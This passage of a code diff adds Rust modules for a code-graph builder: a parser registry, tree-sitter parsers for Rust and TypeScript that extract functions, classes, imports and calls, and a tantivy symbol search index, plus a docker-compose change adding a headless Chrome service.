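}

fn main() {
    assert_eq!(
        extract_import_module("from foo.bar import baz").as_deref(),
        Some("foo.bar")
    );
    assert_eq!(extract_import_module("import os").as_deref(), Some("os"));
    assert_eq!(
        extract_import_module("import numpy as np").as_deref(),
        Some("numpy")
    );
    assert_eq!(extract_import_module("x = 1"), None);
    println!("ok");
}
```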

View File

@@ -0,0 +1,182 @@
use std::collections::HashMap;
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tracing::info;
use super::javascript::JavaScriptParser;
use super::python::PythonParser;
use super::rust_parser::RustParser;
use super::typescript::TypeScriptParser;
/// Registry of language parsers, indexed by file extension
pub struct ParserRegistry {
parsers: Vec<Box<dyn LanguageParser>>,
extension_map: HashMap<String, usize>,
}
impl ParserRegistry {
/// Create a registry with all built-in parsers
pub fn new() -> Self {
let parsers: Vec<Box<dyn LanguageParser>> = vec![
Box::new(RustParser::new()),
Box::new(PythonParser::new()),
Box::new(JavaScriptParser::new()),
Box::new(TypeScriptParser::new()),
];
let mut extension_map = HashMap::new();
for (idx, parser) in parsers.iter().enumerate() {
for ext in parser.extensions() {
extension_map.insert(ext.to_string(), idx);
}
}
Self {
parsers,
extension_map,
}
}
/// Check if a file extension is supported
pub fn supports_extension(&self, ext: &str) -> bool {
self.extension_map.contains_key(ext)
}
/// Get supported extensions
pub fn supported_extensions(&self) -> Vec<&str> {
self.extension_map.keys().map(|s| s.as_str()).collect()
}
/// Parse a file, selecting the appropriate parser by extension
pub fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<Option<ParseOutput>, CoreError> {
let ext = file_path
.extension()
.and_then(|e| e.to_str())
.unwrap_or("");
let parser_idx = match self.extension_map.get(ext) {
Some(idx) => *idx,
None => return Ok(None),
};
let parser = &self.parsers[parser_idx];
info!(
file = %file_path.display(),
language = parser.language(),
"Parsing file"
);
let output = parser.parse_file(file_path, source, repo_id, graph_build_id)?;
Ok(Some(output))
}
/// Parse all supported files in a directory tree
pub fn parse_directory(
&self,
dir: &Path,
repo_id: &str,
graph_build_id: &str,
max_nodes: u32,
) -> Result<ParseOutput, CoreError> {
let mut combined = ParseOutput::default();
let mut node_count: u32 = 0;
        self.walk_directory(
            dir,
            dir,
            repo_id,
            graph_build_id,
            max_nodes,
            &mut node_count,
            &mut combined,
        )?;
info!(
nodes = combined.nodes.len(),
edges = combined.edges.len(),
"Directory parsing complete"
);
Ok(combined)
}
fn walk_directory(
&self,
base: &Path,
dir: &Path,
repo_id: &str,
graph_build_id: &str,
max_nodes: u32,
node_count: &mut u32,
combined: &mut ParseOutput,
) -> Result<(), CoreError> {
let entries = std::fs::read_dir(dir).map_err(|e| {
CoreError::Graph(format!("Failed to read directory {}: {e}", dir.display()))
})?;
for entry in entries {
let entry = entry.map_err(|e| CoreError::Graph(format!("Dir entry error: {e}")))?;
let path = entry.path();
// Skip hidden directories and common non-source dirs
if let Some(name) = path.file_name().and_then(|n| n.to_str()) {
if name.starts_with('.')
|| name == "node_modules"
|| name == "target"
|| name == "__pycache__"
|| name == "vendor"
|| name == "dist"
|| name == "build"
|| name == ".git"
{
continue;
}
}
if path.is_dir() {
self.walk_directory(
base,
&path,
repo_id,
graph_build_id,
max_nodes,
node_count,
combined,
)?;
} else if path.is_file() {
if *node_count >= max_nodes {
info!(max_nodes, "Reached node limit, stopping parse");
return Ok(());
}
let ext = path.extension().and_then(|e| e.to_str()).unwrap_or("");
if !self.supports_extension(ext) {
continue;
}
// Use relative path from base
let rel_path = path.strip_prefix(base).unwrap_or(&path);
let source = match std::fs::read_to_string(&path) {
Ok(s) => s,
Err(_) => continue, // Skip binary/unreadable files
};
if let Some(output) = self.parse_file(rel_path, &source, repo_id, graph_build_id)?
{
*node_count += output.nodes.len() as u32;
combined.nodes.extend(output.nodes);
combined.edges.extend(output.edges);
}
}
}
Ok(())
}
}
impl Default for ParserRegistry {
fn default() -> Self {
Self::new()
}
}
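The registry's core trick is a one-time extension-to-parser index built at construction. A minimal self-contained sketch of that dispatch (language names stand in for the boxed `LanguageParser` trait objects; the function name here is illustrative):

```rust
use std::collections::HashMap;

// Sketch of the ParserRegistry extension -> parser dispatch:
// each parser registers its extensions into a HashMap at startup,
// then lookup is O(1) per file.
fn language_for_extension(ext: &str) -> Option<&'static str> {
    let parsers: &[(&'static str, &[&'static str])] = &[
        ("rust", &["rs"]),
        ("python", &["py"]),
        ("javascript", &["js", "jsx", "mjs", "cjs"]),
        ("typescript", &["ts", "tsx"]),
    ];
    let mut extension_map: HashMap<&str, usize> = HashMap::new();
    for (idx, (_, exts)) in parsers.iter().enumerate() {
        for ext in exts.iter() {
            extension_map.insert(*ext, idx);
        }
    }
    extension_map.get(ext).map(|&i| parsers[i].0)
}

fn main() {
    assert_eq!(language_for_extension("tsx"), Some("typescript"));
    assert_eq!(language_for_extension("rs"), Some("rust"));
    assert_eq!(language_for_extension("md"), None);
    println!("ok");
}
```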

View File

@@ -0,0 +1,426 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct RustParser;
impl RustParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_item" | "function_signature_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
let is_entry = name == "main"
|| self.has_attribute(&node, source, "test")
|| self.has_attribute(&node, source, "tokio::main")
|| self.has_pub_visibility(&node, source);
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
// Extract function calls within the body
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
}
}
"struct_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified,
name: name.to_string(),
kind: CodeNodeKind::Struct,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"enum_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified,
name: name.to_string(),
kind: CodeNodeKind::Enum,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"trait_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Trait,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Parse methods inside the trait
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return; // Don't walk children again
}
}
"impl_item" => {
// Extract impl target type for qualified naming
let impl_name = self.extract_impl_type(&node, source);
let qualified = match parent_qualified {
Some(p) => format!("{p}::{impl_name}"),
None => format!("{file_path}::{impl_name}"),
};
// Check for trait impl (impl Trait for Type)
if let Some(trait_node) = node.child_by_field_name("trait") {
let trait_name = &source[trait_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: qualified.clone(),
target: trait_name.to_string(),
kind: CodeEdgeKind::Implements,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
// Walk methods inside impl block
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return;
}
"use_declaration" => {
let use_text = &source[node.byte_range()];
// Extract the imported path
if let Some(path) = self.extract_use_path(use_text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified
.unwrap_or(file_path)
.to_string(),
target: path,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
"mod_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Module,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// If it has a body (inline module), walk it
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return;
}
}
}
_ => {}
}
// Default: walk children
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child,
source,
file_path,
repo_id,
graph_build_id,
caller_qualified,
output,
);
}
}
fn has_attribute(&self, node: &Node<'_>, source: &str, attr_name: &str) -> bool {
if let Some(prev) = node.prev_sibling() {
if prev.kind() == "attribute_item" || prev.kind() == "attribute" {
let text = &source[prev.byte_range()];
return text.contains(attr_name);
}
}
false
}
fn has_pub_visibility(&self, node: &Node<'_>, source: &str) -> bool {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "visibility_modifier" {
let text = &source[child.byte_range()];
return text == "pub";
}
}
false
}
fn extract_impl_type(&self, node: &Node<'_>, source: &str) -> String {
if let Some(type_node) = node.child_by_field_name("type") {
return source[type_node.byte_range()].to_string();
}
"unknown".to_string()
}
    fn extract_use_path(&self, use_text: &str) -> Option<String> {
        // "use foo::bar::baz;" or "pub use foo::bar;" -> the imported path.
        // Locate "use " rather than strip_prefix so visibility modifiers
        // ("pub", "pub(crate)") don't defeat the match.
        let idx = use_text.find("use ")?;
        let path = use_text[idx + 4..].trim_end_matches(';').trim();
        if path.is_empty() {
            None
        } else {
            Some(path.to_string())
        }
    }
}
impl LanguageParser for RustParser {
fn language(&self) -> &str {
"rust"
}
fn extensions(&self) -> &[&str] {
&["rs"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_rust::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set Rust language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse Rust file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
// Add file node
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}
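The `use`-path extraction is again plain string slicing over the declaration text. A standalone sketch (a hypothetical free function mirroring `RustParser::extract_use_path`, locating "use " so `pub use` re-exports are also captured):

```rust
// Sketch of the Rust use-path extraction: find "use " instead of
// requiring it as a prefix, so visibility modifiers are tolerated.
fn extract_use_path(use_text: &str) -> Option<String> {
    let idx = use_text.find("use ")?;
    let path = use_text[idx + 4..].trim_end_matches(';').trim();
    (!path.is_empty()).then(|| path.to_string())
}

fn main() {
    assert_eq!(
        extract_use_path("use std::collections::HashMap;").as_deref(),
        Some("std::collections::HashMap")
    );
    assert_eq!(
        extract_use_path("pub use crate::foo;").as_deref(),
        Some("crate::foo")
    );
    assert_eq!(extract_use_path("fn main() {}"), None);
    println!("ok");
}
```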

View File

@@ -0,0 +1,419 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct TypeScriptParser;
impl TypeScriptParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: self.is_exported(&node),
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"class_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Heritage clause (extends/implements)
self.extract_heritage(
&node, source, file_path, repo_id, graph_build_id, &qualified, output,
);
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body, source, file_path, repo_id, graph_build_id, Some(&qualified),
output,
);
}
return;
}
}
"interface_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Interface,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"method_definition" | "public_field_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Method,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"lexical_declaration" | "variable_declaration" => {
self.extract_arrow_functions(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
"import_statement" => {
let text = &source[node.byte_range()];
if let Some(module) = self.extract_import_source(text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child, source, file_path, repo_id, graph_build_id, caller_qualified, output,
);
}
}
fn extract_arrow_functions(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "variable_declarator" {
let name_node = child.child_by_field_name("name");
let value_node = child.child_by_field_name("value");
if let (Some(name_n), Some(value_n)) = (name_node, value_node) {
if value_n.kind() == "arrow_function" || value_n.kind() == "function" {
let name = &source[name_n.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: child.start_position().row as u32 + 1,
end_line: child.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = value_n.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified,
output,
);
}
}
}
}
}
}
fn extract_heritage(
&self,
node: &Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
class_qualified: &str,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "class_heritage" {
let text = &source[child.byte_range()];
// "extends Base implements IFoo, IBar"
if let Some(rest) = text.strip_prefix("extends ") {
let base = rest.split_whitespace().next().unwrap_or(rest);
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: base.trim_matches(',').to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(child.start_position().row as u32 + 1),
});
}
if text.contains("implements ") {
if let Some(impl_part) = text.split("implements ").nth(1) {
for iface in impl_part.split(',') {
let iface = iface.trim();
if !iface.is_empty() {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: iface.to_string(),
kind: CodeEdgeKind::Implements,
file_path: file_path.to_string(),
line_number: Some(child.start_position().row as u32 + 1),
});
}
}
}
}
}
}
}
fn is_exported(&self, node: &Node<'_>) -> bool {
if let Some(parent) = node.parent() {
return parent.kind() == "export_statement";
}
false
}
fn extract_import_source(&self, import_text: &str) -> Option<String> {
let from_idx = import_text.find("from ");
let start = if let Some(idx) = from_idx {
idx + 5
} else {
import_text.find("import ")? + 7
};
let rest = &import_text[start..];
let module = rest
.trim()
.trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
if module.is_empty() {
None
} else {
Some(module.to_string())
}
}
}
impl LanguageParser for TypeScriptParser {
fn language(&self) -> &str {
"typescript"
}
fn extensions(&self) -> &[&str] {
&["ts", "tsx"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_typescript::LANGUAGE_TYPESCRIPT;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set TypeScript language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse TypeScript file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}
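The import-source extraction above handles two TypeScript import forms: `import { X } from './mod';` and bare side-effect imports like `import './styles.css';`. A standalone sketch of the same logic (no parser state, identical string handling) makes the two paths easy to check:

```rust
/// Standalone sketch of `extract_import_source` above: same offsets and
/// trimming, lifted out of the parser so the two import forms are visible.
fn import_source(import_text: &str) -> Option<String> {
    // `import { X } from './mod';`  -> take what follows "from "
    // `import './side-effect.css';` -> take what follows "import "
    let start = match import_text.find("from ") {
        Some(idx) => idx + "from ".len(),
        None => import_text.find("import ")? + "import ".len(),
    };
    let module = import_text[start..]
        .trim()
        .trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
    (!module.is_empty()).then(|| module.to_string())
}
```

Note that a line with neither `from ` nor `import ` short-circuits to `None` via the `?` operator, mirroring the `Option`-returning method in the parser.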


@@ -0,0 +1,128 @@
use compliance_core::error::CoreError;
use compliance_core::models::graph::CodeNode;
use tantivy::collector::TopDocs;
use tantivy::query::QueryParser;
use tantivy::schema::{Schema, Value, STORED, TEXT};
use tantivy::{doc, Index, IndexWriter, ReloadPolicy};
use tracing::info;
/// BM25 text search index over code symbols
pub struct SymbolIndex {
index: Index,
#[allow(dead_code)]
schema: Schema,
qualified_name_field: tantivy::schema::Field,
name_field: tantivy::schema::Field,
kind_field: tantivy::schema::Field,
file_path_field: tantivy::schema::Field,
language_field: tantivy::schema::Field,
}
#[derive(Debug, Clone, serde::Serialize)]
pub struct SearchResult {
pub qualified_name: String,
pub name: String,
pub kind: String,
pub file_path: String,
pub language: String,
pub score: f32,
}
impl SymbolIndex {
/// Create a new in-memory symbol index
pub fn new() -> Result<Self, CoreError> {
let mut schema_builder = Schema::builder();
let qualified_name_field = schema_builder.add_text_field("qualified_name", TEXT | STORED);
let name_field = schema_builder.add_text_field("name", TEXT | STORED);
let kind_field = schema_builder.add_text_field("kind", TEXT | STORED);
let file_path_field = schema_builder.add_text_field("file_path", TEXT | STORED);
let language_field = schema_builder.add_text_field("language", TEXT | STORED);
let schema = schema_builder.build();
let index = Index::create_in_ram(schema.clone());
Ok(Self {
index,
schema,
qualified_name_field,
name_field,
kind_field,
file_path_field,
language_field,
})
}
/// Index a set of code nodes
pub fn index_nodes(&self, nodes: &[CodeNode]) -> Result<(), CoreError> {
let mut writer: IndexWriter = self
.index
.writer(50_000_000)
.map_err(|e| CoreError::Graph(format!("Failed to create index writer: {e}")))?;
for node in nodes {
writer
.add_document(doc!(
self.qualified_name_field => node.qualified_name.as_str(),
self.name_field => node.name.as_str(),
self.kind_field => node.kind.to_string(),
self.file_path_field => node.file_path.as_str(),
self.language_field => node.language.as_str(),
))
.map_err(|e| CoreError::Graph(format!("Failed to add document: {e}")))?;
}
writer
.commit()
.map_err(|e| CoreError::Graph(format!("Failed to commit index: {e}")))?;
info!(nodes = nodes.len(), "Symbol index built");
Ok(())
}
/// Search for symbols matching a query
pub fn search(&self, query_str: &str, limit: usize) -> Result<Vec<SearchResult>, CoreError> {
let reader = self
.index
.reader_builder()
.reload_policy(ReloadPolicy::Manual)
.try_into()
.map_err(|e| CoreError::Graph(format!("Failed to create reader: {e}")))?;
let searcher = reader.searcher();
let query_parser =
QueryParser::for_index(&self.index, vec![self.name_field, self.qualified_name_field]);
let query = query_parser
.parse_query(query_str)
.map_err(|e| CoreError::Graph(format!("Failed to parse query: {e}")))?;
let top_docs = searcher
.search(&query, &TopDocs::with_limit(limit))
.map_err(|e| CoreError::Graph(format!("Search failed: {e}")))?;
let mut results = Vec::new();
for (score, doc_address) in top_docs {
let doc: tantivy::TantivyDocument = searcher
.doc(doc_address)
.map_err(|e| CoreError::Graph(format!("Failed to retrieve doc: {e}")))?;
let get_field = |field: tantivy::schema::Field| -> String {
doc.get_first(field)
.and_then(|v| v.as_str())
.unwrap_or("")
.to_string()
};
results.push(SearchResult {
qualified_name: get_field(self.qualified_name_field),
name: get_field(self.name_field),
kind: get_field(self.kind_field),
file_path: get_field(self.file_path_field),
language: get_field(self.language_field),
score,
});
}
Ok(results)
}
}
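The `SymbolIndex` flow is index-then-search: add one document per `CodeNode`, commit, then run a parsed query through `TopDocs` and read stored fields back out. A toy stand-in (hypothetical, stdlib only — a `HashMap` with a trivial exact-vs-prefix score instead of tantivy's BM25) illustrates the same flow without the crate dependency:

```rust
use std::collections::HashMap;

/// Toy stand-in for the tantivy-backed SymbolIndex: maps a symbol name to
/// its qualified names and ranks exact matches (1.0) above prefix matches
/// (0.5). Real scoring in the code above is BM25 over tokenized fields.
struct ToySymbolIndex {
    by_name: HashMap<String, Vec<String>>, // name -> qualified names
}

impl ToySymbolIndex {
    fn new() -> Self {
        Self { by_name: HashMap::new() }
    }

    /// Analogue of `index_nodes`: register one symbol.
    fn index(&mut self, name: &str, qualified: &str) {
        self.by_name
            .entry(name.to_string())
            .or_default()
            .push(qualified.to_string());
    }

    /// Analogue of `search`: score, sort descending, truncate to `limit`.
    fn search(&self, query: &str, limit: usize) -> Vec<(String, f32)> {
        let mut hits: Vec<(String, f32)> = self
            .by_name
            .iter()
            .filter(|(name, _)| name.starts_with(query))
            .flat_map(|(name, quals)| {
                let score = if name.as_str() == query { 1.0 } else { 0.5 };
                quals.iter().map(move |q| (q.clone(), score))
            })
            .collect();
        hits.sort_by(|a, b| b.1.partial_cmp(&a.1).unwrap());
        hits.truncate(limit);
        hits
    }
}
```

The in-RAM tantivy index above has the same lifecycle caveat as this toy: nothing is persisted, so the dashboard must rebuild the index from stored `CodeNode` rows on each graph build.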


@@ -0,0 +1 @@
pub mod index;


@@ -9,13 +9,6 @@ services:
     volumes:
       - mongo_data:/data/db
-  searxng:
-    image: searxng/searxng:latest
-    ports:
-      - "8888:8080"
-    environment:
-      - SEARXNG_BASE_URL=http://localhost:8888
-
   agent:
     build:
       context: .
@@ -40,6 +33,16 @@ services:
       - mongo
       - agent
+  chromium:
+    image: browserless/chrome:latest
+    ports:
+      - "3003:3000"
+    environment:
+      MAX_CONCURRENT_SESSIONS: 5
+      CONNECTION_TIMEOUT: 60000
+      PREBOOT_CHROME: "true"
+    restart: unless-stopped
+
 volumes:
   mongo_data:
   repos_data:
